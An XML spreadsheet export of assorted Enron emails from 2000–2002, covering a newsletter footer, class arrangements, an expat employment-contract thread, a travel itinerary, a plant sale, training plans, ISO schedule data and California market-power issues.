	_x000D_
	_x000D_
	_x000D_
	Thought For Today: "A man cannot be too careful in the choice of his _x000D_
enemies." - Oscar Wilde (1854-1900)._x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	back to top _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]Born Today_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	- Former CIA director Stansfield Turner is 77._x000D_
	- Actor Robert Symonds is 74._x000D_
	- Singer Billy Paul is 66._x000D_
	- Actor-comedian-director Woody Allen is 65._x000D_
	- Singer Lou Rawls is 65._x000D_
	- Golfer Lee Trevino is 61._x000D_
	- Singer Dianne Lennon (Lennon Sisters) is 61._x000D_
	- Comedian-actor Richard Pryor is 60._x000D_
	- Country musician Casey Van Beek (Tractors) is 58._x000D_
	- Rock singer-musician Eric Bloom (Blue Oyster Cult) is 56._x000D_
	- Rock musician John Densmore (Doors) is 56._x000D_
	- Actress-singer Bette Midler is 55._x000D_
	- Singer Gilbert O'Sullivan is 54._x000D_
	- Actor Treat Williams is 49._x000D_
	- Country singer Kim Richey is 44._x000D_
	- Actress Charlene Tilton is 42._x000D_
	- Actress-model Carol Alt is 40._x000D_
	- Actor Jeremy Northam is 39._x000D_
	- Actor Nestor Carbonell is 33._x000D_
	- Actor Ron Melendez is 28._x000D_
	- Gospel singer Sarah Masen is 25._x000D_
	- Actress Ashley Monique Clark is 12._x000D_
	_x000D_
	Source: Associated Press_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	back to top _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	Click on Ad -- Support InfoBeat's Free Services_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	You are subscribed with e-mail address: [judy.hernandez@enron.com]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	InfoBeat Home | User Profile | Unsubscribe_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	entertainment | finance | fun | news | snow reports | sports | weather_x000D_
	_x000D_
	(C) 2000 indimi, inc. All rights reserved._x000D_
	InfoBeat is a registered tradmark of indimi, inc. InfoBeat services are_x000D_
	for personal use only. Commercial use or redistribution in any_x000D_
	form, printed or electronic, is prohibited._x000D_
	 _x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	</t>
  </si>
  <si>
    <t>Wed, 25 Jul 2001 12:19:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Friday's class</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
Would you like me to use the slides you attached_x000D_
or expand/replace them with some additional material._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"John D. Martin" &lt;J_Martin@baylor.edu&gt;@ENRON [mailto:IMCEANOTES-+22John+20D+2E+20Martin+22+20+3CJ+5FMartin+40baylor+2Eedu+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, July 25, 2001 1:50 PM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	Friday's class_x000D_
_x000D_
Vince,_x000D_
_x000D_
I am attaching some powerpoint slides that I have prepared for the EMBAs in_x000D_
Dallas.  I wanted to share them in the event that you might find them_x000D_
useful (don't feel the need to use them however as they are self-contained_x000D_
notes that the students can use independently of your comments)._x000D_
_x000D_
John McCormack and I will await your arrival at the Cooper Center tomorrow_x000D_
night before going to dinner.  Shirley sent me your schedule which_x000D_
indicates your arrival at Love Field at 6:20.  I suspect that you can be at_x000D_
the Cooper Center by 7:30 so if you will give me a call when you arrive we_x000D_
can gather together for dinner._x000D_
_x000D_
Thanks again for taking the time out of your very busy schedule to help out_x000D_
in my class._x000D_
_x000D_
your friend,_x000D_
_x000D_
John_x000D_
_x000D_
p.s. I hope your cross country trip went well._x000D_
_x000D_
 - EXmbaLec3bD.ppt &lt;&lt; File: EXmbaLec3bD.ppt &gt;&gt; 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Tue, 27 Jun 2000 11:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'matthias.lee@enron.com'})</t>
  </si>
  <si>
    <t>Re: URGENT : Employment Contract - Rich Slovenski</t>
  </si>
  <si>
    <t xml:space="preserve">Matt, _x000D_
_x000D_
Thanks for your email.  I believe that there is an agreement in place between _x000D_
ENA and Enron Expat Services.  In general, the contract is between ENA and _x000D_
the employee, if the person is an expat.  The assignment letter covers the _x000D_
employee's transfer to Expat Services.  We haven't usually amended/assigned _x000D_
the agreement over to Expat Services, because the payroll/benefits, etc. are _x000D_
through ENA. _x000D_
_x000D_
If there are changes to his ENA agreement, it is very easy for me to do them, _x000D_
and I am happy to handle it._x000D_
_x000D_
If Mr. Slovenski is a VP level or above employee (I simply cannot remember _x000D_
right now), then Executive Compensation needs to be involved._x000D_
_x000D_
I hope this answers your questions.  I have copied Sharon Butcher on this _x000D_
email because she has been involved with assignments/expats for several _x000D_
years.  If you have further questions, please reply to both of us so that we _x000D_
can be aware of questions._x000D_
_x000D_
Thanks a lot._x000D_
_x000D_
Michelle_x000D_
_x000D_
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Matthias Lee_x000D_
	06/27/2000 03:48 AM_x000D_
		_x000D_
		 To: Michelle Hargrave/HOU/ECT@ECT_x000D_
		 cc: Lilian Low/SIN/ECT@ECT, Angeline Poon/SIN/ECT@ECT, Michelle _x000D_
Cash/HOU/ECT@ECT, Kimberly Rizzi/HOU/ECT@ECT, John L Nowlan/HOU/ECT@ECT, John _x000D_
Chismar/SIN/ECT@ECT_x000D_
		 Subject: Re: URGENT : Employment Contract - Rich Slovenski_x000D_
_x000D_
Michelle_x000D_
_x000D_
Subject to any views Michelle Cash has, I would be happy to assist by _x000D_
drafting the agreed amendments to the Rich's Contract. I understand from _x000D_
Lilian that changes would only be to the Annex and would not affect the main _x000D_
body of the Contract. I can work with Lilian on this once she is able to _x000D_
finalise the agreed amendments with John Nowlan. _x000D_
_x000D_
I note your advice that ENA is the correct employing entity and the intended _x000D_
arrangement is a secondment from Enron Expat Services to ENA.  However, your _x000D_
suggestion for a clause in the Contract to reference the secondment would not _x000D_
be sufficient to put the arrangement in place. Rather, there should be an _x000D_
agreement between Enron Expat Services and ENA. I believe such an agreement _x000D_
is likely to be in place as Rich is not the first expat here in Singapore _x000D_
from ENA - John Chismar and John Thomas who are here precede him. _x000D_
_x000D_
Because I do not have the background to the relevant inter-company _x000D_
arrangement between ENA and Enron Expat Services, I would suggest  you _x000D_
discuss with Michelle Cash on to clarify this issue, and perhaps make the _x000D_
necessary amendments to the letter of offer which presently provides that _x000D_
Enron Expat Services is the employer and that Rich will be expected to _x000D_
provide services for ENA, instead of secondment from ENA to Enron Expat _x000D_
Services_x000D_
_x000D_
Regards_x000D_
Matt_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michelle Hargrave_x000D_
_x000D_
06/26/2000 09:40 PM_x000D_
_x000D_
To: Lilian Low/SIN/ECT@ECT_x000D_
cc: Matthias Lee/SIN/ECT@ECT, Kimberly Rizzi/HOU/ECT@ECT, John L _x000D_
Nowlan/HOU/ECT@ECT, John Chismar/SIN/ECT@ECT, Tim _x000D_
Poullain-Patterson/LON/ECT@ECT, Angeline Poon/SIN/ECT@ECT, Michelle _x000D_
Cash/HOU/ECT@ECT, Alan Aronowitz/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: URGENT : Employment Contract - Rich Slovensky  _x000D_
_x000D_
Lillian,_x000D_
_x000D_
We were discussing this with our International HR Rep and we feel that since _x000D_
the offer letter indicates Enron Expat Services as the employe, the _x000D_
employment agreement should reflect employment by ENA and we need to add a _x000D_
clause secunding Mr. Slovinski to Enron Expat Service.  PLEASE have Matthias _x000D_
make the amendments so we can get this in place as soon as possible.  I am _x000D_
sure that as long as Legal in Singapore makes the necessary changes it will _x000D_
be fine.  The important thing is to get Rich to sign the contract!_x000D_
_x000D_
You did receive the employment agreements we fed-ex'd you on June 6th didn't _x000D_
you?  Make the necessary changes and send a copy to us._x000D_
_x000D_
This was our first Expat and it has been a real learning experience._x000D_
_x000D_
Regards,_x000D_
Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lilian Low_x000D_
06/23/2000 09:18 PM_x000D_
To: Michelle Hargrave/HOU/ECT@ECT_x000D_
cc: Matthias Lee/SIN/ECT@ECT, Kimberly Rizzi/HOU/ECT@ECT, John L _x000D_
Nowlan/HOU/ECT@ECT, John Chismar/SIN/ECT@ECT, Tim _x000D_
Poullain-Patterson/LON/ECT@ECT, Angeline Poon/SIN/ECT@ECT, Michelle _x000D_
Cash/HOU/ECT@ECT, Alan Aronowitz/HOU/ECT@ECT _x000D_
Subject: Re: URGENT : Employment Contract - Rich Slovensky  _x000D_
_x000D_
Michelle,_x000D_
_x000D_
Per my email to you and Kim (copied John Nowlan and John Chismar) dated 22 _x000D_
June, there were some amendments to his package which was only approved that _x000D_
day.  I do not have the soft copy of the executables to make the changes nor _x000D_
am I sure if I m allowed to make amendments to them without legal reviewing _x000D_
them._x000D_
_x000D_
Since Legal Singapore is aware of the situation, and if it is agreeable, we _x000D_
can make amendments to the existing hard copies and have Matthias review _x000D_
them.  This should expedite this.  However, we still need to know who would _x000D_
be the employers of Rich - ENA or Expat services._x000D_
_x000D_
Lilian_x000D_
_x000D_
_x000D_
_x000D_
Michelle Hargrave_x000D_
_x000D_
23/06/2000 21:40_x000D_
_x000D_
To: Matthias Lee/SIN/ECT@ECT_x000D_
cc: Kimberly Rizzi/HOU/ECT@ECT, John L Nowlan/HOU/ECT@ECT, John _x000D_
Chismar/SIN/ECT@ECT, Lilian Low/SIN/ECT@ECT, Tim _x000D_
Poullain-Patterson/LON/ECT@ECT, Angeline Poon/SIN/ECT@ECT, Michelle _x000D_
Cash/HOU/ECT@ECT, Alan Aronowitz/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: URGENT : Employment Contract - Rich Slovensky  _x000D_
_x000D_
Matthias - the executables were Fed-Ex'd to Lillian on June 6th.  We have _x000D_
just been waiting for Rich to sign them and return them!  Would you have any _x000D_
idea as to why he has not signed yet?? As for it being Eron Expat or Enron _x000D_
North America I will let Michelle Cash in our legal dept. respond to that._x000D_
_x000D_
Michelle - can you respond on whether or not it matters as to Enron Expat or _x000D_
Enron North America and which is correct??_x000D_
_x000D_
Regards,_x000D_
Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Matthias Lee_x000D_
06/22/2000 11:03 PM_x000D_
To: Michelle Hargrave/HOU/ECT@ECT, Kimberly Rizzi/HOU/ECT@ECT_x000D_
cc: John L Nowlan/HOU/ECT@ECT, John Chismar/SIN/ECT@ECT, Lilian _x000D_
Low/SIN/ECT@ECT, Tim Poullain-Patterson/LON/ECT@ECT, Angeline _x000D_
Poon/SIN/ECT@ECT, Michelle Cash/HOU/ECT@ECT, Alan Aronowitz/HOU/ECT@ECT _x000D_
Subject: URGENT : Employment Contract - Rich Slovensky_x000D_
_x000D_
Michelle / Kimberly_x000D_
_x000D_
Please allow me to introduce myself - I am Legal Counsel for ECT Singapore. _x000D_
_x000D_
It has just been brought to my attention by our HR Specialist Lilian Low that _x000D_
the employment contract for our new trader Rich Slovensky has not been _x000D_
executed. You would appreciate that that gives us a slew of control, _x000D_
compliance and legal issues. Apart from confidentiality issues, Rich does not _x000D_
presently have authority to bind ECT Singapore in contracts._x000D_
_x000D_
Please let me have your very urgent advice whether we can expect Rich's _x000D_
employment contract to be in place immediately to regularise the situation or _x000D_
whether we have to implement measures to stop Rich's trading activity. _x000D_
_x000D_
Additionally, I noticed that the cover letter offering employment to Rich _x000D_
refers to employment with Enron Expat Services but the employment contract _x000D_
states that ENA is the employer. Please clarify or rectify as appropriate._x000D_
_x000D_
Regards_x000D_
Matt Lee_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 06:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>htl confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">                                                   SALES AGT: EM/ZVD7PZ_x000D_
_x000D_
                                          THOLT/JANE_x000D_
                                          E-TKT RECEIPT_x000D_
_x000D_
  ENRON CORP_x000D_
  1400 SMITH_x000D_
  HOUSTON TX 77002_x000D_
_x000D_
_x000D_
_x000D_
  DATE:  NOV 14 2000_x000D_
_x000D_
SERVICE               DATE  FROM           TO             DEPART  ARRIVE_x000D_
_x000D_
CONTINENTAL AIRLINES  30NOV HOUSTON TX     WASHINGTON DC  100P    456P_x000D_
CO 1220    Q          THU   G.BUSH INTERCO DULLES INTL_x000D_
                            TERMINAL C_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         2:56 DURATION_x000D_
                  AIRCRAFT: BOEING 737-500_x000D_
                            SEAT 08C NO SMOKING CONFIRMED THOLT/JANE(IDS5_x000D_
_x000D_
HOTEL                 02DEC COURTYARD DULLES SOUTH_x000D_
                      03DEC 3935 CENTERVIEW DRIVE_x000D_
                            CHANTILLY, DC 20151_x000D_
                            UNITED STATES OF AMERICA_x000D_
                            TELEPHONE: 1-703 7097100_x000D_
                            FAX: 1-703 7098672_x000D_
                            CONFIRMATION: 81845304_x000D_
                            REFERENCE: HDYA00_x000D_
                            SINGLE ROOM KING SIZE BED_x000D_
                            RATE: HOL USD 58.00 PER NIGHT_x000D_
                            GUARANTEE GIVEN_x000D_
                            RQST NON SMKG TO COMPLETE PARTY OF 3 ROOMS_x000D_
_x000D_
HOTEL                 02DEC COURTYARD DULLES SOUTH_x000D_
                      03DEC 3935 CENTERVIEW DRIVE_x000D_
                            CHANTILLY, DC 20151_x000D_
                            UNITED STATES OF AMERICA_x000D_
                            TELEPHONE: 1-703 7097100_x000D_
                            FAX: 1-703 7098672_x000D_
                            CONFIRMATION: 81845538_x000D_
                            REFERENCE: HDYA00_x000D_
                            SINGLE ROOM KING SIZE BED_x000D_
                            RATE: HOL USD 58.00 PER NIGHT_x000D_
                            GUARANTEE GIVEN_x000D_
                            RQST NON SMKG_x000D_
_x000D_
HOTEL                 02DEC COURTYARD DULLES SOUTH_x000D_
                      03DEC 3935 CENTERVIEW DRIVE_x000D_
                            CHANTILLY, DC 20151_x000D_
                            UNITED STATES OF AMERICA_x000D_
                            TELEPHONE: 1-703 7097100_x000D_
                            FAX: 1-703 7098672_x000D_
                            CONFIRMATION: 81845909_x000D_
                            REFERENCE: HDYB00_x000D_
                            SINGLE ROOM DOUBLE BED_x000D_
                            RATE: HOL USD 67.00 PER NIGHT_x000D_
                            GUARANTEE GIVEN_x000D_
                            RQST ROOM W 2 DBLS BEDS NON SMKG_x000D_
_x000D_
CONTINENTAL AIRLINES  03DEC WASHINGTON DC  HOUSTON TX     630A    849A_x000D_
CO 1435    Q          SUN   DULLES INTL    G.BUSH INTERCO_x000D_
                                           TERMINAL C_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         3:19 DURATION_x000D_
                  AIRCRAFT: BOEING 737-500_x000D_
                            SEAT 07C NO SMOKING CONFIRMED THOLT/JANE(IDS5_x000D_
               THIS IS A NON-REFUNDABLE FARE THAT REQUIRES_x000D_
               TRAVEL ON THESE SPECIFIC DATES AND FLIGHTS._x000D_
               ANY CHANGES WILL RESULT IN A PENALTY AND/OR_x000D_
                         ADDITIONAL COLLECTION._x000D_
           **************************************************_x000D_
         YOUR TICKET REFLECTS A NEGOTIATED DISCOUNT FROM THE TAP_x000D_
              THE PUBLISHED FARE FOR THIS TICKET IS $206.00_x000D_
           **************************************************_x000D_
_x000D_
RESERVATION NUMBER(S)  CO/LQ6K2H_x000D_
_x000D_
THOLT/JANE  S5C0413R1058                 TICKET:CO/ETKT 005 7017929503_x000D_
_x000D_
CO  FREQUENT FLYER COSC266224_x000D_
**********************************************_x000D_
THE FEE FOR THIS PERSONAL TRAVEL IS CHARGED BY ENRON CORP._x000D_
**********************************************_x000D_
THIS IS THE PASSENGER RECEIPT FOR YOUR ELECTRONIC TICKET._x000D_
PLEASE CHECK-IN WITH PHOTO IDENTIFICATION AND WITH_x000D_
ITHER (1) THIS RECEIPT OR (2) YOUR CONFIRMATION NUMBER._x000D_
YOUR E-TKT CONFIRMATION NUMBER IS: L Q 6 K 2 H_x000D_
*************************************************_x000D_
YOUR HOTELS ARE GUARANTEED FOR LATE ARRIVAL._x000D_
TO AVOID BILLING CANCEL BY 6PM DAY OF ARRIVAL.</t>
  </si>
  <si>
    <t>Thu, 12 Jul 2001 12:05:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'david.duran@enron.com', 'steve.van@enron.com', 'cris.sherman@enron.com', 'heather.kroll@enron.com', 'joseph.deffner@enron.com', 't..hodge@enron.com', 'theresa.vos@enron.com', 'don.miller@enron.com'})</t>
  </si>
  <si>
    <t>Sale of North Carolina Plants to AIG Highstar</t>
  </si>
  <si>
    <t>I wanted each of you to know that the sale to AIG Highstar just closed.  We are in receipt of the wire from AIG (approx $27 million) and are in the process of sending the wires back out (approx $1 million).  Feel free to call with any questions._x000D_
_x000D_
Regards,_x000D_
_x000D_
Stuart</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 02:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL Nom for February 14, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0214.xls)_x000D_
_x000D_
 - HPLN0214.xls</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 13:06:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'r..brackett@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'c..gossett@enron.com'})</t>
  </si>
  <si>
    <t>FW: Revised Book Entry template</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Champion, Andrew  _x000D_
Sent:	Tuesday, January 08, 2002 11:47 AM_x000D_
To:	Brackett, Debbie R._x000D_
Cc:	Ramesh, Ganapathy_x000D_
Subject:	Revised Book Entry template_x000D_
_x000D_
_x000D_
Debbie, here's the updated Book Entry template.  Added a few dropdowns and "helpful entry tips".  Thanks._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 21 Mar 2002 19:08:10 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jesse.alvarado@enron.com'})</t>
  </si>
  <si>
    <t>PLAINS  TURBINE   GEN. OR A/C POWER  ALARM</t>
  </si>
  <si>
    <t xml:space="preserve">                         If you get a Alarm on the Generator Running  or on a  A/C Power Failure Alarm at the Plains Sta. let LEWIS RENEAU  with the ANDREWS TEAM  know right away .     Thanks JESSE A.                </t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 17:03:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'paul.choi@enron.com', 'tim.heizenrader@enron.com', 'christian.yoder@enron.com', 'susan.rance@enron.com', 'legal &lt;.hall@enron.com&gt;', 'stewart.rosman@enron.com', 'john.postlethwaite@enron.com', 'stacy.runswick@enron.com', 'heather.dunton@enron.com', 'f..calger@enron.com', 'donald.robinson@enron.com', 'jeff.richter@enron.com', 'bill.williams@enron.com', 'todd.perry@enron.com', 'diana.scholtes@enron.com', 'diane.cutsforth@enron.com', 'matt.motley@enron.com', 'sean.crandall@enron.com', 'scotty.gilbert@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Mandatory Planning Meeting - Training Sessions</t>
  </si>
  <si>
    <t>Please plan on attending a meeting on Wednesday January 2nd at 11 AM in Mt. Hood._x000D_
_x000D_
During the first two weeks of January we would like to hold training sessions for people in our office.  The goal is to provide an overview of each major function in our office to anyone who is interested in learning about what goes on here.  My current thinking is to spend an hour each day, say from 11 AM until noon, in training.  One or more people from each group will be responsible for coming up with an outline/agenda and leading an hour long session on what you do.  If you have received this e-mail, you have been tentatively nominated by me to lead or co-lead one of the training sessions._x000D_
_x000D_
Here are the sessions that I propose:_x000D_
_x000D_
Overview		Tim Belden and/or Chris Calger_x000D_
Risk			John Postlethwaite_x000D_
Scheduling		Stacey Runswick, Donald Robinson, Diane Cutsforth_x000D_
Fundamentals		Tim Heizenrader_x000D_
Real Time		Bill Williams_x000D_
Term Trading		Matt Motley_x000D_
Cash Trading		Sean Crandall_x000D_
California Market	Jeff Richter_x000D_
Middle Market		Stewart Rosman and Paul Choi_x000D_
Services		Chris Foster_x000D_
Credit			Susan Rance_x000D_
RTO Development	Alan Comnes_x000D_
Legal			Christian Yoder_x000D_
BPA			Steve Hall_x000D_
_x000D_
Here are some ideas to consider for presentations:_x000D_
What does your job entail -- important timelines and workflow during the day._x000D_
Inputs and Outputs to your job -- information and people_x000D_
Who are your internal/external customers?_x000D_
What is the purpose of your job?_x000D_
Lingo - what is the vocabulary of your job?_x000D_
_x000D_
At our meeting I would like to brainstorm potential ideas for the presenations and get some group input on what should be covered and how it should be covered.  Thanks for your help with this.</t>
  </si>
  <si>
    <t>Sat, 3 Mar 2001 12:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 3/3/01; HourAhead hour: 21;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 3/3/01; HourAhead hour: 21;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30321.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
+++ Hour 21 - bad data from ISO._x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: Wheelabrat_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/3/01_x000D_
  UNIT_ID: MARTEL_2_AMFOR_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 21 / Preferred:  74.56 / Final:  74.38)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SCE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/3/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Jun 2000 11:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'delma.salazar@enron.com'})</t>
  </si>
  <si>
    <t>March Liquidations</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 06/07/2000 _x000D_
06:30 PM ---------------------------_x000D_
_x000D_
_x000D_
Jim Little_x000D_
05/08/2000 08:40 AM_x000D_
To: Cathy Sprowls/HOU/ECT@ECT, Cathy De La Torre/HOU/ECT@ECT, Gregory A _x000D_
Mausser/HOU/ECT@ECT, Janie Aguayo/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, _x000D_
Melba A Bowen/HOU/ECT@ECT, Mary Theresa Franklin/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: March Liquidations_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 11:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Rick's Panel on Wholesale/Retail Market Power Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
Thanks again for your help.  I appreciate it._x000D_
_x000D_
Regards,_x000D_
_x000D_
Lara_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff Dasovich_x000D_
09/06/2000 03:02 PM_x000D_
To: Lara Leibman/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Rick's Panel on Wholesale/Retail Market Power Issues_x000D_
_x000D_
Lara:  I have rather hastily put this list together.  For that I apologize.  _x000D_
Hope it is helpful.  The things on the list are ones that you've likely _x000D_
already considered.  Nevertheless, some of the issues we face in California _x000D_
include:_x000D_
_x000D_
1. POWER PLANTS_x000D_
The utilities' subs are building power plants; competitors (like Enron) are _x000D_
also trying to develop plants to sell power into both wholesale and retail _x000D_
markets._x000D_
The utilities control the interconnection of plants to the grid. _x000D_
The interconnection rules are currently so vague and ambiguous, that the _x000D_
utility could quite easily favor its generation sub over competitors._x000D_
This would have an effect on prices at both the wholesale and retail level _x000D_
(i.e., how do we know we've gotten the best generation deal if the utility _x000D_
can favor its subs plants via interconnection?)._x000D_
_x000D_
2. DISTRIBUTED GENERATION_x000D_
And the same goes for DG:  in California many are pointing to DG as a viable _x000D_
solution to the price spikes._x000D_
If the utility loses sales because a customer has installed DG on her _x000D_
premises as a hedge against price spikes, the utility will have an incentive _x000D_
to thwart interconnection of the DG unit.  (Recall that in many places, _x000D_
recovery of distribution costs is derived from kwh sales; and if sales go _x000D_
down, so can recovery of the utilities' distribution-related costs)._x000D_
In addition, if someone attempts to install DG at the grid level (as opposed _x000D_
to on-site DG) and sell the DG power in wholesale and retail markets, the _x000D_
utility has the ability to frustrate the DG project via interconnection.  _x000D_
This permits the utility to retain bundled service customers.  Utility _x000D_
control of DG Interconnection can also permit the utility to favor its DG _x000D_
subs._x000D_
_x000D_
3. INTERCONNECTION/VOLTAGE BUY-UP_x000D_
And the same goes for the retail level---remember how SDG&amp;E used _x000D_
interconnection to thwart our deal with South West Marine in San Diego. _x000D_
(Obviously, we're not doing these deals any more, but the interconnection _x000D_
caused us ultimately to lose the commodity deal, too.)_x000D_
_x000D_
4. TRADING_x000D_
PG&amp;E and Sempra have developed significant trading units.  _x000D_
Now that the utilities have been granted authority to buy outside the PX, the _x000D_
trading subs are getting more aggressive and vocal about the opportunity to _x000D_
sell the utility power via short and long term power contracts.  _x000D_
Again, any sort of favoritism could do considerable harm to consumers and _x000D_
competition (through the shareholders of the utilities' parent would surely _x000D_
profit)._x000D_
_x000D_
5. DISTRIBUTION_x000D_
In general, the utilities control over distribution is complete and it's a _x000D_
problem (see DG, above, for example).  _x000D_
Shouldn't state and federal policy makers at least consider doing the _x000D_
equivalent of FERC Order 888 (i.e., open access) at the distribution level?  _x000D_
Right now, distribution is a real black box._x000D_
_x000D_
6. RETAIL_x000D_
In California, the utility effectively controls customer sign-up, switching, _x000D_
information, and turn back.  The problems have been significant._x000D_
_x000D_
7. MARKET INSTITUTIONS_x000D_
Finally, a big mistake in California was to replace one monopoly--the _x000D_
utility--with another--the PX.  _x000D_
Because the utility has been forced to buy from the PX, and because the _x000D_
market structure in California gives customers no incentive to switch, the _x000D_
utility continues to control the overwhelming majority of the load in _x000D_
California.  _x000D_
This gives the utilities monopsony power.  With that power, they can _x000D_
influence PX prices.  _x000D_
Solution:  1) Don't make the PX a monopoly. 2) Create a system that provides _x000D_
customers with the incentive to switch._x000D_
_x000D_
If you have any questions, or if there's anything else I can do to help, _x000D_
don't hesitate._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 09:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carl.livermore@enron.com', 'grant.masson@enron.com', 'berney.aucoin@enron.com'})</t>
  </si>
  <si>
    <t>TECO model</t>
  </si>
  <si>
    <t>Team,_x000D_
_x000D_
We've done a lot of good work lately on the evaluation models and I think we _x000D_
are converging on a platform that accurately models the product, the project _x000D_
and my structure's risk.  The only remaining issues when we're done will _x000D_
relate to the curves._x000D_
_x000D_
Just so we're all on the same page, I thought I would lay out the base _x000D_
scenario:_x000D_
_x000D_
Hourly vols_x000D_
Mid power and oil curves_x000D_
Beginning debt of $375/kw amortising mortgage style over 20-years_x000D_
Debt interest rates of T+225_x000D_
Plant residual value of $100/kw_x000D_
Enron will own a 50 MW call from 5/2001 to 12/31/2020.  Strike prices will be _x000D_
$50/mwh for years 1-5, $75/mwh for years 6-10, and $100/mwh for the balance _x000D_
of the term._x000D_
The basic put or no put trigger algorithm is (plant value + put option value _x000D_
&gt;= par amount of bonds outstanding).  As the model calculates equity's _x000D_
decision whether or not to put the plant to Enron, we should reduce each _x000D_
years par amount of bonds outstanding by the debt service reserve fund.  This _x000D_
proxy's the fact that equity will consider when making their put decision _x000D_
each year that there are moneys in the DSRF, working capital reserves and _x000D_
equity sweep accounts._x000D_
Whatever power/oil correlation's structuring thinks are appropriate._x000D_
_x000D_
I hope to see results Monday.  If there are any questions, please call me at _x000D_
3-4750._x000D_
_x000D_
regards,_x000D_
_x000D_
Don Black</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 02:39:00 -0700 (PDT)</t>
  </si>
  <si>
